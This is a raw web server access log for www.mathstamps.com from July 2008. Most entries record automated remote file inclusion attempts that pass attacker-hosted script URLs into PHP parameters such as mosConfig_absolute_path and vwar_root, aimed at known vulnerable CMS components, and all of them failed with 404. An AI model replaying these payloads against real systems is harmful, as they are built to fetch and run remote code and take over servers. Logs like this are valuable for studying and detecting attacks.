207.210.115.114 - - [27/Jul/2008:18:43:47 -0700] "GET /logs/access_080526.log/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:18:43:47 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:18:43:47 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:18:43:49 -0700] "GET /logs/access_080526.log/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:18:43:49 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:18:43:50 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.195.37.124 - - [27/Jul/2008:18:44:00 -0700] "GET /logs/access_080623.log HTTP/1.0" 200 4697619 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
82.154.157.108 - - [27/Jul/2008:18:44:41 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070801 Firefox/2.0 Wyzo/0.5.3" "www.mathstamps.com"
82.154.157.108 - - [27/Jul/2008:18:48:29 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070801 Firefox/2.0 Wyzo/0.5.3" "www.mathstamps.com"
82.154.157.108 - - [27/Jul/2008:18:50:13 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070801 Firefox/2.0 Wyzo/0.5.3" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:18:54:09 -0700] "GET /logs/access_080609.log//config/dbutil.bck.php?confdir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:18:54:09 -0700] "GET //config/dbutil.bck.php?confdir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:18:54:39 -0700] "GET /logs/access_080609.log//config/dbutil.bck.php?confdir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:18:54:39 -0700] "GET //config/dbutil.bck.php?confdir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:18:54:59 -0700] "GET /logs/access_080519.log//config/dbutil.bck.php?confdir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
82.154.157.108 - - [27/Jul/2008:18:55:22 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070801 Firefox/2.0 Wyzo/0.5.3" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:18:55:54 -0700] "GET /logs/access_080519.log//config/dbutil.bck.php?confdir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
207.58.181.13 - - [27/Jul/2008:18:57:23 -0700] "GET //include/write.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
81.92.219.130 - - [27/Jul/2008:18:57:27 -0700] "GET /logs//include/write.php?dir=http://www.educsi.com.br/includes/Cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
81.92.219.130 - - [27/Jul/2008:18:57:27 -0700] "GET /logs/access_080310.log//include/write.php?dir=http://www.educsi.com.br/includes/Cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
81.92.219.130 - - [27/Jul/2008:18:57:28 -0700] "GET //include/write.php?dir=http://www.educsi.com.br/includes/Cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:18:58:49 -0700] "GET /logs/access_080623.log//include/bbs.lib.inc.php?site_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
81.92.219.130 - - [27/Jul/2008:18:59:19 -0700] "GET /logs/access_080630.log//include/write.php?dir=http://www.educsi.com.br/includes/Cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
207.58.181.13 - - [27/Jul/2008:18:59:23 -0700] "GET /logs/access_080630.log//include/write.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.58.181.13 - - [27/Jul/2008:18:59:23 -0700] "GET //include/write.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.58.181.13 - - [27/Jul/2008:18:59:23 -0700] "GET /logs//include/write.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.58.181.13 - - [27/Jul/2008:19:00:31 -0700] "GET /logs/access_080310.log//include/write.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:19:01:44 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
201.48.230.113 - - [27/Jul/2008:19:04:26 -0700] "GET /logs/errors.php?error=http://eskentx.kit.net/kangkung.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
201.48.230.113 - - [27/Jul/2008:19:04:26 -0700] "GET /errors.php?error=http://eskentx.kit.net/kangkung.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
201.48.230.113 - - [27/Jul/2008:19:04:28 -0700] "GET /logs/access_080519.log/errors.php?error=http://eskentx.kit.net/kangkung.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:19:09:42 -0700] "GET /logs/access_080512.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:10:33 -0700] "GET /logs/access_080331.log/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:10:33 -0700] "GET /errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:10:33 -0700] "GET /logs/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:10:43 -0700] "GET /logs/access_080331.log/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:10:43 -0700] "GET /errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:10:43 -0700] "GET /logs/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
200.207.2.62 - - [27/Jul/2008:19:12:05 -0700] "GET /logs/access_080630.log//include/write.php?dir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
200.207.2.62 - - [27/Jul/2008:19:12:05 -0700] "GET //include/write.php?dir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
200.207.2.62 - - [27/Jul/2008:19:12:06 -0700] "GET /logs//include/write.php?dir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
64.22.89.194 - - [27/Jul/2008:19:12:11 -0700] "GET /logs/access_080602.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.22.89.194 - - [27/Jul/2008:19:12:11 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.22.89.194 - - [27/Jul/2008:19:12:11 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.22.89.194 - - [27/Jul/2008:19:12:12 -0700] "GET /logs/access_080616.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.44.234.103 - - [27/Jul/2008:19:12:22 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.44.234.103 - - [27/Jul/2008:19:12:22 -0700] "GET /logs/access_080602.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.44.234.103 - - [27/Jul/2008:19:12:22 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.44.234.103 - - [27/Jul/2008:19:12:22 -0700] "GET /logs/access_080616.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.204.109.42 - - [27/Jul/2008:19:12:28 -0700] "GET /logs/access_080630.log//include/write.php?dir=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.204.109.42 - - [27/Jul/2008:19:12:28 -0700] "GET //include/write.php?dir=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.204.109.42 - - [27/Jul/2008:19:12:29 -0700] "GET /logs//include/write.php?dir=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.207.2.62 - - [27/Jul/2008:19:14:10 -0700] "GET /logs/access_080310.log//include/write.php?dir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
219.94.155.28 - - [27/Jul/2008:19:16:27 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
219.94.155.28 - - [27/Jul/2008:19:16:28 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
219.94.128.213 - - [27/Jul/2008:19:16:32 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.mathstamps.com"
219.94.128.213 - - [27/Jul/2008:19:16:32 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.mathstamps.com"
200.204.109.42 - - [27/Jul/2008:19:16:52 -0700] "GET /logs/access_080310.log//include/write.php?dir=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.106.13.141 - - [27/Jul/2008:19:16:54 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
59.106.13.141 - - [27/Jul/2008:19:16:55 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
219.94.162.56 - - [27/Jul/2008:19:16:57 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.mathstamps.com"
219.94.162.56 - - [27/Jul/2008:19:16:58 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.mathstamps.com"
64.22.89.194 - - [27/Jul/2008:19:17:15 -0700] "GET /logs/access_080616.log%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.22.89.194 - - [27/Jul/2008:19:17:27 -0700] "GET /logs/access_080602.log%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.44.234.103 - - [27/Jul/2008:19:18:39 -0700] "GET /logs/access_080616.log%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.44.234.103 - - [27/Jul/2008:19:18:50 -0700] "GET /logs/access_080602.log%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
204.15.10.22 - - [27/Jul/2008:19:18:52 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.mathstamps.com"
204.15.10.22 - - [27/Jul/2008:19:18:52 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:19:08 -0700] "GET /logs/access_080505.log//ashnews.php?pathtoashnews=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:19:08 -0700] "GET //ashnews.php?pathtoashnews=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:19:12 -0700] "GET /logs/access_080505.log//ashnews.php?pathtoashnews=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:19:12 -0700] "GET //ashnews.php?pathtoashnews=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:19:14 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:19:15 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
193.178.228.12 - - [27/Jul/2008:19:19:37 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
193.178.228.12 - - [27/Jul/2008:19:19:37 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
207.235.90.6 - - [27/Jul/2008:19:19:54 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:19:19:54 -0700] "GET /logs/access_080609.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
207.235.90.6 - - [27/Jul/2008:19:19:55 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:19:22:52 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
66.226.64.33 - - [27/Jul/2008:19:24:19 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
66.226.64.33 - - [27/Jul/2008:19:24:19 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:24:57 -0700] "GET /logs/access_080623.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:24:57 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:24:58 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:24:59 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:24:59 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:25:00 -0700] "GET /logs/access_080623.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:25:00 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:25:18 -0700] "GET /logs/access_080602.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:25:23 -0700] "GET /logs/access_080602.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
70.85.147.82 - - [27/Jul/2008:19:26:08 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.mathstamps.com"
70.85.147.82 - - [27/Jul/2008:19:26:08 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:26:45 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:26:45 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:26:46 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:26:46 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:26:46 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:26:46 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:26:47 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:26:47 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:26:56 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:26:57 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:19:27:02 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:19:27:04 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:19:27:05 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.205.68.170 - - [27/Jul/2008:19:28:51 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.205.68.170 - - [27/Jul/2008:19:28:51 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.205.68.170 - - [27/Jul/2008:19:28:51 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:19:30:38 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
